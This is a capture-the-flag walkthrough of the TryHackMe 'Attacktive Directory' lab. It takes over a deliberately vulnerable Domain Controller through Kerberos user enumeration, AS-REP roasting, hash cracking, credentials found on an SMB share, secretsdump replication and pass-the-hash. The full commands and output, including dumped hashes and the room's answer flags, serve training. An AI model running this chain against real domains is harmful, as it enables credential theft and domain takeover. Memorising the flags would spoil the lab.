TryHackMe: Attacktive Directory Walkthrough

Onur Alp Akin
7 min readApr 13, 2023

Hi, in this room we will exploit a vulnerable Domain Controller.

Original Publish Date: Feb 28, 2023

We will need some tools likepython3-impacket, bloodhound and neo4j to utilize while attacking Active Directory. Installing bloodhound will install neo4j too on Kali.

Enumeration: Welcome to Attacktive Directory

Let’s start the machine, wait for it to boot up, then run a nmap scan.

To get the most we can, I’m using -A to enable OS detection and version scanning, -F to scan only ports listed in services file and using the fastest speed (Because this is a virtual lab, I’m not worried I might trigger something.)

nmap -A -T5 -F 10.10.247.101

What tool will allow us to enumerate port 139/445?

Searching 139,445 on hacktricks gives us a way to obtain information

#Dump interesting information
enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
...

Trying all the tools names from top to bottom, the first tool name, enum4linux, is apparently what we’re looking for.

What is the NetBIOS-Domain Name of the machine?

Running enum4linux just with machine IP.

================================( Getting domain SID for 10.10.247.101 )================================                                         

Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

What invalid TLD do people commonly use for their Active Directory Domain?

From the nmap results

3389/tcp open  ms-wbt-server Microsoft Terminal Services                                                                                          
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local

Enumeration: Enumerating Users via Kerberos

A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords and even password spray!

go install github.com/ropnop/kerbrute@latest
cd ~/go/bin
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

What command within Kerbrute will allow us to enumerate valid usernames?

Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit

We should run kerbrute now. Just supplying IP, will spit out lots of errors like

...
2023/02/28 05:35:24 > [!] michael@10.10.247.101 - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2023/02/28 05:35:24 > [!] NULL@10.10.247.101 - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2023/02/28 05:35:24 > [!] john@10.10.247.101 - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
2023/02/28 05:35:24 > [!] admin@10.10.247.101 - KDC ERROR - Wrong Realm. Try adjusting the domain? Aborting...
...

So we must add domain name to our hosts file

echo 10.10.247.101 spookysec.local | tee -a /etc/hosts

After giving domain name as a parameter, it asks for a domain controller too. Thus, we must add that parameter also.

The final command looks like this:

./kerbrute userenum --domain 'spookysec.local' --dc 'spookysec.local' userlist.txt

What notable account is discovered? (These should jump out at you)

2023/02/28 05:39:14 >  [+] VALID USERNAME:       james@spookysec.local
2023/02/28 05:39:16 > [+] VALID USERNAME: svc-admin@spookysec.local
2023/02/28 05:39:18 > [+] VALID USERNAME: James@spookysec.local
2023/02/28 05:39:19 > [+] VALID USERNAME: robin@spookysec.local
2023/02/28 05:39:27 > [+] VALID USERNAME: darkstar@spookysec.local
2023/02/28 05:39:33 > [+] VALID USERNAME: administrator@spookysec.local
2023/02/28 05:39:44 > [+] VALID USERNAME: backup@spookysec.local
2023/02/28 05:39:48 > [+] VALID USERNAME: paradox@spookysec.local

What is the other notable account is discovered? (These should jump out at you)

See above.

Exploitation: Abusing Kerberos

After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.

Impacket has a tool called “GetNPUsers.py” that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames, which we enumerated previously via Kerbrute.

After I saw potentially lucrative usernames, I’ve made a file:

echo -e "svc-admin\nbackup" > users.txt

Then ran impacket script:

impacket-GetNPUsers spookysec.local/ -usersfile users.txt

Results

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:20644348121d236445ef67b8161e151a$5e6cd4673af57b6780ba962791bc3afc273de59d93c8661e756b12c01e657dddd716e7833de6dbaa51c6e36b28771ea10a942d61e5f46cce32cb09ef4098406ae8fe46cb5abe92d7f845de87e0aa629fc6487dc808a3548fbf2c25b12b31912ddaff99fd7a0bbadeebc1998fea622275f93a5872cf8fe6fe9bddd2152e9a6073a5439bc2c542d5f5e9324ea8be389e6f69f6b9b3240cd38f881379c9be806e3d131b8f1e2ffc7c14c4598413ee20924ab036c4b53350d21b607ea4381069a60631990d6691e2a0933ba7793d045e6001e40f74b5b2d3a56de9f3eee290fd8f069738fabb7cec955387eea0d897f688eaa270
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

18200  Kerberos 5, etype 23, AS-REP  $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac

What mode is the hash?

See one line above.

Now crack the hash with the modified password list provided, what is the user accounts password?

Create hash file

echo '$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:20644348121d236445ef67b8161e151a$5e6cd4673af57b6780ba962791bc3afc273de59d93c8661e756b12c01e657dddd716e7833de6dbaa51c6e36b28771ea10a942d61e5f46cce32cb09ef4098406ae8fe46cb5abe92d7f845de87e0aa629fc6487dc808a3548fbf2c25b12b31912ddaff99fd7a0bbadeebc1998fea622275f93a5872cf8fe6fe9bddd2152e9a6073a5439bc2c542d5f5e9324ea8be389e6f69f6b9b3240cd38f881379c9be806e3d131b8f1e2ffc7c14c4598413ee20924ab036c4b53350d21b607ea4381069a60631990d6691e2a0933ba7793d045e6001e40f74b5b2d3a56de9f3eee290fd8f069738fabb7cec955387eea0d897f688eaa270' > hash.txt

Run hashcat like this:

hashcat -a 0 -m 18200 hash.txt passwordlist.txt

Result:

management2005

Enumeration: Back to the Basics

With a user’s account credentials, we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out

What utility can we use to map remote SMB shares?

If you don’t know already, hacktricks says:

smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash

Which option will list shares?

-L, --list=HOST                              Get a list of shares available on a host

How many remote shares is the server listing?

Sharename       Type      Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

There is one particular share that we have access to that contains a text file. Which share is it?

Intuitively, backup looks promising, so I will enter an interactive prompt like this:

smbclient -U 'svc-admin%management2005' \\\\spookysec.local\\backup
smb: \> ls                                                                                                                                        
. D 0 Sat Apr 4 19:08:39 2020
.. D 0 Sat Apr 4 19:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 19:08:53 2020

Download the file

get backup_credentials.txt

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

Command to decode:

cat backup_credentials.txt | base64 -d

Contents:

backup@spookysec.local:backup2517860

Domain Privilege Escalation: Elevating Privileges within the Domain

Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?

Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes

Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain

What method allowed us to dump NTDS.DIT?

# impacket-secretsdump -h | grep NTDS.DIT
-ntds NTDS NTDS.DIT file to parse
resume file name to resume NTDS.DIT session dump (only
Extract only NTDS.DIT data for the user specified.
-just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos
-just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)
-pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.

Command we need to use per help page:

impacket-secretsdump -just-dc backup@spookysec.local

For answer, see below.

What is the Administrator’s NTLM hash?

Password:                                                                                                                                         
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:f2ed955aefdc3725330c715ef7cc2662:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:e6e8679c18335a5727c74a0801720ad16b7c97dbc8742ef4be569b8285bf1abb
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:f46858dffe32ad676fc974361b7149f7
ATTACKTIVEDIREC$:des-cbc-md5:760276df75aef4df
[*] Cleaning up...

What method of attack could allow us to authenticate as the user without the password?

pass the hash

If you didn’t know the technique already, you could’ve seen it from mitre

Using a tool called Evil-WinRM what option will allow us to use a hash?

...
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
...

Flags

svc-admin

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

TryHackMe{B4ckM3UpSc0tty!}

Administrator

TryHackMe{4ctiveD1rectoryM4st3r}

--

--